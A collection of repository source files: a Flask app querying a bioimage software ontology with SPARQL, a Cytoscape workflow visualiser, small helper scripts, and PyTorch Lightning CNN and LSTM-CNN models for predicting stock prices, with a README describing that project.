<http://biii.eu/node/software> .\n\t ?s1 biii:hasTopic ?edam_class .\n\t ?edam_class rdfs:label ?label .\n\t}\n\tGROUP BY ?edam_class ?label\n \n\tORDER BY DESC(?soft_count)\n\n \"\"\", initNs=ns)\n\n for row in qres:\n tbl.append({\"name\": row['label'],\"count\":row['soft_count']})\n\n return render_template('testQ4.html', tbl=tbl)\n\[email protected]('/demo_query_3')\ndef demoQ3():\n query = \"\"\"\n CONSTRUCT {\n ?ti <http://bise-eu.info/core-ontology#hasTopic> ?label \n } WHERE {\n ?x a <http://biii.eu/node/software> .\n ?x <http://bise-eu.info/core-ontology#hasAuthor> ?a .\n ?x <http://dcterms/title> ?ti .\n ?x <http://bise-eu.info/core-ontology#hasTopic> ?c .\n \n ?c 
rdfs:subClassOf* ?superClass .\n        ?superClass rdfs:label ?label .\n\n        FILTER (regex(?label, \"microscopy\"))\n    }\n    \"\"\"\n\n    qres = g.query(query)\n\n    list_of_nodes = []\n    list_of_edges = []\n    for row in qres:\n        list_of_nodes.append({\"id\": row[0], \"type\": \"software\"})\n        list_of_nodes.append({\"id\": row[2], \"type\": \"topic\"})\n        list_of_edges.append({\"source\": row[0], \"target\": row[2], \"edge_label\": row[1]})\n\n    # print(list_of_nodes)\n    # print(list_of_edges)\n    return render_template('demo_d3.html', nodes=list_of_nodes, edges=list_of_edges)\n\n## Demo Workflow 1\[email protected]('/sparql')\ndef sparql():\n    return render_template('sparql.html')\n\n## Demo Workflow 1\[email protected]('/graph')\ndef graph():\n    # list_of_nodes = [{\"label\": \"node1\"},\n    #                  {\"label\": \"node2\"},\n    #                  {\"label\": \"node3\"}]\n    # list_of_edges = [{\"source\": \"node1\", \"target\": \"node2\"},\n    #                  {\"source\": \"node1\", \"target\": \"node3\"}]\n    list_of_nodes = []\n    list_of_edges = []\n\n    qres = g.query(\n        \"\"\"\n        SELECT DISTINCT ?c2 ?f2_label ?c1 ?f1_label WHERE {\n            ?c2 p-plan:isPreceededBy ?c1 .\n\n            ?c2 nb:hasImplementation ?s2 .\n            ?c2 nb:hasFunction ?f2 .\n            ?f2 rdfs:label ?f2_label .\n\n            ?c1 nb:hasImplementation ?s1 .\n            ?c1 nb:hasFunction ?f1 .\n        }\n        \"\"\", initNs=ns)\n\n    with open('static/data/wf.csv', 'w', newline='') as csvfile:\n        fieldnames = ['source', 'source_label', 'target', 'target_label', 'value']\n        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n        writer.writeheader()\n        for row in qres:\n            list_of_nodes.append({\"id\": row['c1']})\n            list_of_nodes.append({\"id\": row['c2']})\n            list_of_edges.append({\"source\": row['c1'], \"target\": row['c2'],\n                                  \"source_label\": row['f1_label'], \"target_label\": row['f2_label']})\n            # writer.writerow({'source': row['c1'],\n            #                  'source_label': row['f1_label'],\n            #                  'target': row['c2'],\n            #                  'target_label': row['f2_label'],\n            #                  'value': '2'})\n\n    return render_template('test.html', nodes=list_of_nodes, edges=list_of_edges)\n\[email protected]('/welcome')\ndef welcome():\n    qres = g.query(\n        \"\"\"\n        SELECT DISTINCT ?c2 ?f2_label ?c1 ?f1_label WHERE {\n            ?c2 p-plan:isPreceededBy ?c1 .\n\n            ?c2 biii:hasImplementation ?s2 .\n            ?c2 biii:hasFunction ?f2 .\n            ?f2 rdfs:label ?f2_label .\n\n            ?c1 biii:hasImplementation ?s1 .\n            ?c1 biii:hasFunction ?f1 . 
\n ?f1 rdfs:label ?f1_label .\n }\n \"\"\", initNs=ns)\n\n with open('static/data/wf.csv', 'w', newline='') as csvfile:\n fieldnames = ['source', 'source_label', 'target', 'target_label', 'value']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for row in qres:\n # writer.writerow({'source': row['f1_label'], 'target': row['f2_label'], 'value': '2'})\n # writer.writerow({'source': str(row['f1_label']+\"\\n\"+row['c1']),\n # 'source_label': row['f1_label'],\n # 'target': str(row['f1_label']+\"\\n\"+row['c1']),\n # 'target_label': row['f2_label'],\n # 'value': '3'})\n\n writer.writerow({'source': row['c1'],\n 'source_label': row['f1_label'],\n 'target': row['c2'],\n 'target_label': row['f2_label'],\n 'value': '2'})\n\n # print(row['c2'])\n # print(row['c1'])\n # print(\"%s %s %s %s\" % row)\n\n return render_template('wf.html')\n\n\nif __name__ == \"__main__\":\n # context = ('myserver-dev.crt', 'myserver-dev.key')\n # app.run(host='0.0.0.0', port=5000, debug=True, ssl_context=context)\n # context = ('myserver-dev.crt', 'myserver-dev.key')\n app.run(host='0.0.0.0', port=5000, debug=True)" }, { "alpha_fraction": 0.4859446883201599, "alphanum_fraction": 0.5004608035087585, "avg_line_length": 29.77305030822754, "blob_id": "9ceee07f9cd04a596302188115ac90e788e992fa", "content_id": "6274bb1e4b647464092133dbd26ffa09502c7275", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4340, "license_type": "no_license", "max_line_length": 114, "num_lines": 141, "path": "/wf-html-vis/main.js", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "/*\n* @Author: Alban Gaignard\n* @Date: 2020-03-01 15:55:48\n* @Last Modified by: Alban Gaignard\n* @Last Modified time: 2020-03-02 13:04:39\n*/\n\n// var node_id = \"1432\"\nvar node_id = \"50\"\nvar node_url = \"http://test.biii.eu/node/\" + node_id\nvar node_url = \"http://biii.eu/node/\" + node_id\n//var node_url_json = node_url + \"?_format=json \"\n\nvar nodes = new Set() ;\nvar edges = [] ;\n\nvar cyjs_nodes = [] ;\nvar cyjs_edges = [] ;\n\n//\n//\n//\nvar node2cy = function(x) {\n\t// console.log({data: {id: x} })\n\treturn {data: {id: x, name: x} }\n}\n\n//\n//\n//\nvar edge2cy = function(x) {\n\t// console.log({data: {source: x.source, target: x.target} })\n\treturn {data: {source: x.source, target: x.target} }\n}\n\nvar updateWorkflowVis = function(json_node_url) {\n\n\t\t// $.getJSON('http://test.biii.eu/wfsteps?_format=json', function(data) {\n\t\t$.getJSON('http://biii.eu/wfsteps?_format=json', function(data) {\t\n\t\t// $.getJSON(json_node_url + \"?_format=json \", function(data) {\n\t\t console.log(data);\n\n\t\t $.each(data, function( key, value ) {\n\t\t \t\t// console.log( key + \": \" + value[\"parent_id\"] );\n\t\t \t\t if (value[\"parent_id\"] == node_id) {\n\t\t \t\t\tnodes.add(value[\"field_current_workflow_step__1\"])\n\t\t \t\t\tif (value[\"field_previous_workflow_step\"].includes(\", \")) {\n\t\t \t\t\t\t$.each(value[\"field_previous_workflow_step\"].split(\", \"), function( key, sub_value ) {\n\t\t \t\t\t\t\tnodes.add(sub_value)\n\t\t \t\t\t\t\tedges.push({source:sub_value, target:value[\"field_current_workflow_step__1\"]})\n\t\t \t\t\t\t})\n\t\t \t\t\t} else {\n\t\t \t\t\t\tnodes.add(value[\"field_previous_workflow_step\"])\t\n\t\t \t\t\t\tedges.push({source:value[\"field_previous_workflow_step\"], target:value[\"field_current_workflow_step__1\"]})\n\t\t \t\t\t}\n\t\t \t\t\t\n\t\t \t\t\t//console.log( 
value[\"field_current_workflow_step__1\"] );\n\t\t \t\t\t//console.log( value[\"field_previous_workflow_step\"] );\n\t\t \t\t }\n\t\t\t});\n\n\t\t\tconsole.log(nodes)\n\t\t\tconsole.log(edges)\n\n\t\t\tcyjs_nodes = [...nodes].filter(x => x != \"\").map(node2cy)\n\t\t\tcyjs_edges = [...edges].filter(x => x.source != \"\" && x.target != \"\").map(edge2cy)\n\n\t\t\tvar cy = window.cy = cytoscape({\n\t\t container: document.getElementById('cy'),\n\n\t\t boxSelectionEnabled: false,\n\t\t autounselectify: true,\n\n\t\t layout: {\n\t\t name: 'dagre'\n\t\t },\n\n\t\t style: [\n\t\t {\n\t\t selector: 'node',\n\t\t style: {\n\t\t 'border-color': '#11479e',\n\t\t 'border-width': '2px',\n\t\t 'background-color': 'white',\n\t\t 'content': 'data(name)',\n\t\t 'shape': 'roundrectangle', \n\t\t 'text-valign': 'center', \n\t\t 'text-halign': 'center',\n\t\t 'text-wrap': 'wrap',\n\t\t 'text-max-width': '130px',\n\t\t 'width': '150px',\n\t\t 'height': 'label', \n\t\t 'padding-left': '5px', \n\t\t 'padding-right': '5px', \n\t\t 'padding-top': '10px', \n\t\t 'padding-bottom': '10px', \n\t\t }\n\t\t },\n\n\t\t {\n\t\t selector: 'edge',\n\t\t style: {\n\t\t 'width': 4,\n\t\t 'target-arrow-shape': 'triangle',\n\t\t 'line-color': '#9dbaea',\n\t\t 'target-arrow-color': '#9dbaea',\n\t\t 'curve-style': 'bezier'\n\t\t }\n\t\t }\n\t\t ],\n\n\t\t elements: {\n\t\t nodes: cyjs_nodes,\n\t\t edges: cyjs_edges\n\t\t }\n\t\t });\n\n\t\t\t// cy.nodeHtmlLabel([ {\n // \t\t\tquery: 'node', // cytoscape query selector\n // \t\t\thalign: 'center', // title vertical position. Can be 'left',''center, 'right'\n\t\t\t// valign: 'center', // title vertical position. Can be 'top',''center, 'bottom'\n\t\t\t// halignBox: 'center', // title vertical position. Can be 'left',''center, 'right'\n\t\t\t// valignBox: 'center', // title relative box vertical position. 
Can be 'top',''center, 'bottom'\n\t\t\t// cssClass: '', // any classes will be as attribute of <div> container for every title\n\t\t\t// tpl(data) {\n\t\t\t// return '<a href=\"node_url\">' + data.name + '</a>'; // your html template here\n\t\t\t// }\n\t\t\t// }\n\t\t\t//]);\n\n\t\t});\n\t}\n\nupdateWorkflowVis(node_url)\n\n// console.log('NODES')\n// console.log(cyjs_nodes)\n// console.log('----')\n// console.log('EDGES')\n// console.log(cyjs_edges)\n// console.log('----')\n\n" }, { "alpha_fraction": 0.7213114500045776, "alphanum_fraction": 0.7213114500045776, "avg_line_length": 14.25, "blob_id": "d7d0a028ad8ba21449b68ac1b1149367e17f9d5e", "content_id": "7e3e94c081722a44be58df1bcd9d92cdde130779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 61, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/bise-linked-data-webapp/launch.sh", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource activate bise-ld-webapp ; \npython app.py\n" }, { "alpha_fraction": 0.6803653240203857, "alphanum_fraction": 0.689497709274292, "avg_line_length": 17.25, "blob_id": "5f8bb3f77a5cd0f8302097816e0b11c8902ed6d9", "content_id": "84f6e7d48f5dc50db01f6ab43b164749b00bc8ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 45, "num_lines": 12, "path": "/data-dumps/deprecated/json2csv.py", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "import csv, json, sys\n\ninput = open(sys.argv[1])\ndata = json.load(input)\ninput.close()\n\noutput = csv.writer(sys.stdout)\n\noutput.writerow(data[0].keys()) # header row\n\nfor row in data:\n output.writerow(row.values())\n" } ]
12
engdorm/stock-price-prediction
https://github.com/engdorm/stock-price-prediction
9d82e31cfde51071594f60d027b90b04d28c6867
5fbdd9c6b81fcbaa0011cff381e17bb489e5afa1
87dbb5e6f922b71949fce5b1f0da83071dad1e11
refs/heads/master
2023-02-05T20:10:40.563504
2020-12-29T01:54:46
2020-12-29T01:54:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5650817155838013, "alphanum_fraction": 0.5906389355659485, "avg_line_length": 34.23560333251953, "blob_id": "3055c86c9d229e5b2c90da0176ed1f0b923cae0e", "content_id": "ba6eed7ea828d15a67620aefea1e17724acc61ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6730, "license_type": "no_license", "max_line_length": 97, "num_lines": 191, "path": "/code/cnn.py", "repo_name": "engdorm/stock-price-prediction", "src_encoding": "UTF-8", "text": "import warnings\nwarnings.filterwarnings('ignore')\n\nimport os\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom sklearn.metrics import mean_squared_error\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\nimport pytorch_lightning as pl\n\nroot_dir = '/root/hoai_workspace/stock-price-prediction/'\n\n# STOCK CHART DATASET\nclass StockChartDataset(object):\n def __init__(self, dir_path, transforms):\n self.dir_path = dir_path\n self.transforms = transforms\n df = pd.read_csv(dir_path + 'target.csv')\n self.imgs = df.filename.tolist()\n self.log_target = df.target.tolist()\n\n def __getitem__(self, idx):\n # Load images\n img_path = os.path.join(self.dir_path, self.imgs[idx])\n img = Image.open(img_path).convert('RGB')\n \n target = torch.tensor([self.log_target[idx]])\n\n if self.transforms is not None:\n img = self.transforms(img)\n\n return img, target\n\n def __len__(self):\n return len(self.imgs)\n\n\n# STOCK CHART DATA MODULE\nclass StockChartDataModule(pl.LightningDataModule):\n def setup(self, stage):\n # transforms for images\n transform=transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n self.train = StockChartDataset(root_dir + 'data/charts/train/',\n transforms=transform)\n self.val = StockChartDataset(root_dir + 'data/charts/val/',\n transforms=transform)\n self.test = StockChartDataset(root_dir + 'data/charts/test/',\n transforms=transform)\n \n def train_dataloader(self):\n return DataLoader(self.train, batch_size=64)\n\n def val_dataloader(self):\n return DataLoader(self.val, batch_size=64)\n \n def test_dataloader(self):\n return DataLoader(self.test, batch_size=64)\n\n\n# RESIDUAL BLOCK\nclass ResidualBlock(nn.Module):\n def __init__(self, num_channels, output_channels, stride1, stride2, stride3, **kwargs):\n super(ResidualBlock, self).__init__(**kwargs)\n self.cond = any([stride1 != 1, stride2 != 1, stride3 != 1])\n self.conv1 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride1)\n self.batch_norm = nn.BatchNorm2d(num_channels)\n self.conv2 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride2)\n if self.cond:\n self.conv = nn.Conv2d(num_channels, num_channels, padding=0,\n kernel_size=1, stride=max(stride1, stride2, stride3))\n # Last convolutional layer to reduce output block shape.\n self.conv3 = nn.Conv2d(num_channels, output_channels, padding=0, \n kernel_size=1, stride=stride3)\n self.relu = nn.ReLU(inplace=True)\n \n def forward(self, X):\n if self.cond:\n Y = self.conv(X)\n else:\n Y = X\n X = self.conv1(X)\n X = self.batch_norm(X)\n X = self.relu(X)\n X = self.conv2(X)\n X = self.batch_norm(X)\n X = self.relu(X+Y)\n X = self.conv3(X)\n return X\n\n\n# STOCK CHART CNN MODEL\nclass StockChartCNN(pl.LightningModule):\n def __init__(self, output_shape=1):\n 
super(StockChartCNN, self).__init__()\n self.conv = nn.Conv2d(in_channels=3, out_channels=32, kernel_size=7, stride=2, padding=3)\n self.batch_norm = nn.BatchNorm2d(32)\n self.max_pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.relu = nn.ReLU()\n self.res_conv1 = ResidualBlock(\n num_channels=32, output_channels=128,\n stride1=1, stride2=1, stride3=1)\n self.res_conv2 = ResidualBlock(\n num_channels=128, output_channels=256,\n stride1=2, stride2=1, stride3=1)\n self.res_conv3 = ResidualBlock(\n num_channels=256, output_channels=512,\n stride1=2, stride2=1, stride3=1)\n self.average_pool = nn.AvgPool2d(kernel_size=7, padding=0)\n # self.layer_norm = nn.LayerNorm([512, 1, 1])\n self.fc1 = nn.Linear(in_features=512, out_features=500)\n self.dropout = nn.Dropout(0.5)\n self.fc2 = nn.Linear(in_features=500, out_features=100)\n self.fc3 = nn.Linear(in_features=100, out_features=25)\n self.out = nn.Linear(in_features=25, out_features=output_shape)\n \n def forward(self, X):\n X = self.conv(X)\n X = self.batch_norm(X)\n X = self.relu(X)\n X = self.max_pool(X)\n X = self.res_conv1(X)\n X = self.res_conv2(X)\n X = self.res_conv3(X)\n X = self.average_pool(X)\n # X = self.layer_norm(X)\n X = X.view(X.size(0), -1)\n X = self.fc1(X)\n X = self.dropout(X)\n X = self.fc2(X)\n X = self.dropout(X)\n X = self.fc3(X)\n X = self.dropout(X)\n X = self.out(X)\n return X\n \n def training_step(self, batch, batch_idx):\n # training_step defined the train loop.\n # It is independent of forward\n x, y = batch\n logits = self.forward(x)\n loss = F.mse_loss(logits, y)\n # Logging to TensorBoard by default\n self.log('train_loss', loss)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x, y = batch\n logits = self.forward(x)\n loss = F.mse_loss(logits, y)\n # Logging to TensorBoard by default\n self.log('val_loss', loss)\n return loss\n \n def configure_optimizers(self):\n optimizer = torch.optim.SGD(self.parameters(), lr=0.01, momentum=0.9)\n return optimizer\n # scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n # optimizer, patience=2, verbose=True, min_lr=1e-5\n # )\n # return {'optimizer': optimizer, 'lr_scheduler': scheduler, 'monitor': 'val_loss'}\n\n\n# TRAINER\n# saves a file like: my/path/sample-mnist-epoch=02-val_loss=0.32.ckpt\ncheckpoint_callback = pl.callbacks.ModelCheckpoint(\n monitor='val_loss',\n dirpath=root_dir + 'model/cnn_1227_0',\n filename='dji-non-norm-{epoch:02d}-{val_loss:.9f}',\n save_top_k=5,\n mode='min',\n)\ndata_module = StockChartDataModule()\nmodel = StockChartCNN()\ntrainer = pl.Trainer(gpus=1, max_epochs=100,\n callbacks=[checkpoint_callback],\n default_root_dir=root_dir,\n progress_bar_refresh_rate=2)\ntrainer.fit(model, data_module)\n" }, { "alpha_fraction": 0.5333768129348755, "alphanum_fraction": 0.56013423204422, "avg_line_length": 36.76760482788086, "blob_id": "0422486e827b1f52c0d7ee46d572df2bac17d79d", "content_id": "ff8ad6c7ce78ef3faec053abcad66d9bbe4d2bfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10726, "license_type": "no_license", "max_line_length": 125, "num_lines": 284, "path": "/code/fusion.py", "repo_name": "engdorm/stock-price-prediction", "src_encoding": "UTF-8", "text": "import warnings\nwarnings.filterwarnings('ignore')\n\nimport os\nimport time\nimport math\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nfrom torch.utils.data import 
DataLoader, random_split\nimport pytorch_lightning as pl\n\nroot_dir = '/root/hoai_workspace/stock-price-prediction/'\n\n\n# FUSION DATASETS\nclass FusionDataset(object):\n def __init__(self, df, history_len, step_len, dir_path, transforms):\n self.dir_path = dir_path\n self.transforms = transforms\n df_imgs_path = pd.read_csv(dir_path + 'target.csv')\n self.imgs = df_imgs_path.filename.tolist()\n # self.log_target = df.target.tolist()\n \n self.history_len = history_len\n self.step_len = step_len\n\n df['close_log'] = np.log(df['Close'] / df['Close'].shift(1))\n # df['vol_log'] = np.log(df['Volume'] / df['Volume'].shift(1))\n df['target_log'] = np.log(df['Close'].shift(-step_len) / df['Close'])\n history = []\n target = []\n for i in range(history_len, df.shape[0]-step_len):\n history.append(df[i-history_len+1: i]['close_log'].values)\n target.append(df.loc[i-1, 'target_log'])\n history, target = np.array(history), np.array(target)\n history = np.reshape(history, (history.shape[0], history.shape[1], 1))\n self.history = history\n self.target = target\n\n def __getitem__(self, idx):\n history = torch.tensor(self.history[idx], dtype=torch.float)\n # Load images\n img_path = os.path.join(self.dir_path, self.imgs[idx])\n img = Image.open(img_path).convert('RGB')\n \n target = torch.tensor([self.target[idx]], dtype=torch.float)\n\n if self.transforms is not None:\n img = self.transforms(img)\n\n return history, img, target\n\n def __len__(self):\n return self.history.shape[0]\n\n\n# FUSION DATA MODULE\nclass FusionDataModule(pl.LightningDataModule):\n def __init__(self, df, history_len, step_len):\n super(FusionDataModule, self).__init__()\n self.df = df\n self.history_len = history_len\n self.step_len = step_len\n \n def setup(self, stage):\n # Train/val/test split\n length = self.df.shape[0]\n train_df = self.df[:int(length*0.6)].copy()\n train_df.reset_index(inplace=True)\n val_df = self.df[int(length*0.6):int(length*0.8)].copy()\n val_df.reset_index(inplace=True)\n test_df = self.df[int(length*0.8):].copy()\n test_df.reset_index(inplace=True)\n # transforms for images\n transform=transforms.Compose([transforms.ToTensor(), \n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n self.train = FusionDataset(train_df, self.history_len, self.step_len,\n root_dir + 'data/charts/train/',\n transforms=transform)\n self.val = FusionDataset(val_df, self.history_len, self.step_len,\n root_dir + 'data/charts/val/',\n transforms=transform)\n self.test = FusionDataset(test_df, self.history_len, self.step_len,\n root_dir + 'data/charts/test/',\n transforms=transform)\n \n def train_dataloader(self):\n return DataLoader(self.train, batch_size=64)\n\n def val_dataloader(self):\n return DataLoader(self.val, batch_size=64)\n \n def test_dataloader(self):\n return DataLoader(self.test, batch_size=64)\n\n\n# RESIDUAL BLOCK\nclass ResidualBlock(nn.Module):\n def __init__(self, num_channels, output_channels, stride1, stride2, stride3, **kwargs):\n super(ResidualBlock, self).__init__(**kwargs)\n self.cond = any([stride1 != 1, stride2 != 1, stride3 != 1])\n self.conv1 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride1)\n self.batch_norm = nn.BatchNorm2d(num_channels)\n self.conv2 = nn.Conv2d(num_channels, num_channels, padding=1, \n kernel_size=3, stride=stride2)\n if self.cond:\n self.conv = nn.Conv2d(num_channels, num_channels, padding=0,\n kernel_size=1, stride=max(stride1, stride2, stride3))\n # Last convolutional layer to reduce output block shape.\n self.conv3 = 
nn.Conv2d(num_channels, output_channels, padding=0, \n kernel_size=1, stride=stride3)\n self.relu = nn.ReLU(inplace=True)\n \n def forward(self, X):\n if self.cond:\n Y = self.conv(X)\n else:\n Y = X\n X = self.conv1(X)\n X = self.batch_norm(X)\n X = self.relu(X)\n X = self.conv2(X)\n X = self.batch_norm(X)\n # print(f'cnn x: {X.shape}')\n # print(f'cnn y: {Y.shape}')\n X = self.relu(X+Y)\n X = self.conv3(X)\n return X\n\n\nclass FusionLSTM_CNN_3loss(pl.LightningModule):\n def __init__(self):\n super(FusionLSTM_CNN_3loss, self).__init__()\n p = dict(\n history_len = 30,\n step_len = 5,\n seq_len = 29,\n batch_size = 128, \n criterion = nn.MSELoss(),\n max_epochs = 15,\n n_features = 1,\n hidden_size = 50,\n num_layers = 1,\n dropout = 0.8,\n learning_rate = 0.01\n )\n self.n_features = p['n_features']\n self.hidden_size = p['hidden_size']\n self.seq_len = p['seq_len']\n self.batch_size = p['batch_size']\n self.num_layers = p['num_layers']\n self.dropout = p['dropout']\n self.criterion = p['criterion']\n self.learning_rate = p['learning_rate']\n # LSTM feature\n self.lstm_feature = nn.LSTM(input_size=p['n_features'],\n hidden_size=p['hidden_size'],\n num_layers=p['num_layers'],\n dropout=p['dropout'],\n batch_first=True)\n # CNN feature\n self.cnn_feature = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=32, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(32),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1),\n nn.ReLU(),\n ResidualBlock(\n num_channels=32, output_channels=128,\n stride1=1, stride2=1, stride3=1),\n ResidualBlock(\n num_channels=128, output_channels=256,\n stride1=2, stride2=1, stride3=1),\n ResidualBlock(\n num_channels=256, output_channels=512,\n stride1=2, stride2=1, stride3=1),\n nn.AvgPool2d(kernel_size=7, padding=0),\n nn.LayerNorm([512, 1, 1])\n )\n # LSTM FC\n self.lstm_fc = nn.Linear(in_features=p['hidden_size'], out_features=1)\n # CNN FC\n self.cnn_fc1 = nn.Linear(in_features=512, out_features=500)\n self.cnn_fc2 = nn.Linear(in_features=500, out_features=100)\n self.cnn_fc3 = nn.Linear(in_features=100, out_features=25)\n self.cnn_out = nn.Linear(in_features=25, out_features=1)\n # LSTM-CNN FC\n self.dropout = nn.Dropout(0.5)\n self.fc1 = nn.Linear(in_features=562, out_features=500)\n self.fc2 = nn.Linear(in_features=500, out_features=100)\n self.fc3 = nn.Linear(in_features=100, out_features=25)\n self.out = nn.Linear(in_features=25, out_features=1)\n \n def forward(self, x1, x2):\n # LSTM model\n x1, _ = self.lstm_feature(x1)\n x1 = x1[:,-1]\n lstm_out = self.lstm_fc(x1)\n # CNN model\n x2 = self.cnn_feature(x2)\n x2 = x2.view(x2.size(0), -1)\n cnn_out = self.cnn_fc1(x2)\n cnn_out = self.dropout(cnn_out)\n cnn_out = self.cnn_fc2(cnn_out)\n cnn_out = self.dropout(cnn_out)\n cnn_out = self.cnn_fc3(cnn_out)\n cnn_out = self.dropout(cnn_out)\n cnn_out = self.cnn_out(cnn_out)\n # Fusion model\n fusion_out = torch.cat((x1, x2), 1)\n fusion_out = self.fc1(fusion_out)\n fusion_out = self.dropout(fusion_out)\n fusion_out = self.fc2(fusion_out)\n fusion_out = self.dropout(fusion_out)\n fusion_out = self.fc3(fusion_out)\n fusion_out = self.dropout(fusion_out)\n fusion_out = self.out(fusion_out)\n \n return lstm_out, cnn_out, fusion_out\n \n def training_step(self, batch, batch_idx):\n # training_step defined the train loop.\n # It is independent of forward\n x1, x2, target = batch\n logits_lstm, logits_cnn, logits_fusion = self.forward(x1, x2)\n loss = 0.2*F.mse_loss(logits_lstm, target) + 0.2*F.mse_loss(logits_cnn, target) + F.mse_loss(logits_fusion, 
target)\n # Logging to TensorBoard by default\n self.log('train_loss', loss)\n return loss\n \n def validation_step(self, batch, batch_idx):\n x1, x2, target = batch\n logits_lstm, logits_cnn, logits_fusion = self.forward(x1, x2)\n # loss = 0.2*F.mse_loss(logits_lstm, target) + 0.2*F.mse_loss(logits_cnn, target) + F.mse_loss(logits_fusion, target)\n loss = F.mse_loss(logits_fusion, target)\n # Logging to TensorBoard by default\n self.log('val_loss', loss)\n return loss\n \n def configure_optimizers(self):\n optimizer = torch.optim.SGD(self.parameters(), lr=0.01, momentum=0.9)\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, patience=2, verbose=True, min_lr=1e-5\n )\n return {'optimizer': optimizer, 'lr_scheduler': scheduler, 'monitor': 'val_loss'}\n\n\n# TRAINER\np = dict(\n history_len = 30,\n step_len = 5,\n seq_len = 29,\n batch_size = 128, \n criterion = nn.MSELoss(),\n max_epochs = 15,\n n_features = 1,\n hidden_size = 50,\n num_layers = 1,\n dropout = 0.8,\n learning_rate = 0.01\n )\ndf = pd.read_csv(root_dir + 'data/dji_2009-2019.csv')\ndata_module = FusionDataModule(df, p['history_len'], p['step_len'])\ncheckpoint_callback = pl.callbacks.ModelCheckpoint(\n monitor='val_loss',\n dirpath=root_dir + 'model/fusion-1227_4',\n filename='dji-scheduler-{epoch:02d}-{val_loss:.9f}',\n save_top_k=5,\n mode='min',\n)\ntrainer = pl.Trainer(\n max_epochs=150,\n gpus=1,\n callbacks=[checkpoint_callback]\n)\nmodel = FusionLSTM_CNN_3loss()\ntrainer.fit(model, data_module)\n" }, { "alpha_fraction": 0.7275192141532898, "alphanum_fraction": 0.7654767036437988, "avg_line_length": 40, "blob_id": "095c6094828ef1d111c2af18aa3cc0473a27c520", "content_id": "16db9e6da02e8dbba3c10619eb92be452505acb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 88, "num_lines": 54, "path": "/README.md", "repo_name": "engdorm/stock-price-prediction", "src_encoding": "UTF-8", "text": "Introduction\n============\n\nForecasting stock prices plays an important role in setting a trading\nstrategy or determining the appropriate timing for buying or selling a\nstock. In this project, we use a model, called feature fusion long\nshort-term memory-convolutional neural network (LSTM-CNN) model. It\ncombines features learned from different representations of the same\ndata, namely, stock time series and stock chart images, to predict stock\nprices.\n\nRelated Work\n============\n\nStock prediction is one of the most challenging and long standing\nproblems in the field of time series data. H.Q.Thang @hust used Gaussian\nProcess Regression and Autoregressive Moving Average Model to predict\nVietnam Stock Index Trend. N.V.Son @vbd used ARIMA and LSTM to predict\nsome stock symbols like APPL (Apple), AMZN (Amazon).\n\nIn this project, we use a combined model called long short-term\nmemory-convolutional neural network (LSTM-CNN) to predict closed price\nof Dow Jones Industrial Average (DJIA). As an extension, the model will\nbe implemented on VN-30 index data. Kim T, Kim HY @ours implemented\nfusion LSTM-CNN model on 2018-2019 S&P 500 data. 
Similarly, Hao Y and Gao Q\nconstructed an LSTM-CNN model using 2009-2019 S&P 500 data.\n\nExpected Results\n================\n\n- Understand the CNN and LSTM models and their application to time series\n  forecasting problems.\n\n- Understand the stock price forecasting problem, the application of\n  machine learning in this field, and the shortcomings of using these\n  methods in the real market.\n\nReference\n=========\n\n<span>1.</span> H.Q.Thang. *Vietnam Stock Index Trend Prediction using\nGaussian Process Regression and Autoregressive Moving Average Model*.\nResearch and Development on Information and Communication Technology,\nHUST, 2018.\n\n<span>2.</span> Kim T, Kim HY. *Forecasting stock prices with a feature fusion LSTM-CNN\nmodel using different representations of the same data*. PLoS ONE 14(2):\ne0212320, 2019.\n<https://doi.org/10.1371/journal.pone.0212320>\n\n<span>3.</span> Hao Y, Gao Q. *Predicting the Trend of Stock Market Index Using the\nHybrid Neural Network Based on Multiple Time Scale Machine Learning*.\nMDPI Appl. Sci. 2020, 10(11), 3961.\n<https://doi.org/10.3390/app10113961>" } ]
3
Jessonsotoventura/Berea-College
https://github.com/Jessonsotoventura/Berea-College
e5a2d340996f67d611a8e9f0eb3beeb68dc0266b
f1443b8e8e8fffcdae4248b7ebeda0e8da3e451e
1724be3d4f591eb31d3664b42260c4ca86997c00
refs/heads/master
2019-04-02T07:23:20.143102
2018-03-01T05:08:57
2018-03-01T05:51:00
68,252,306
0
0
null
null
null
null
null
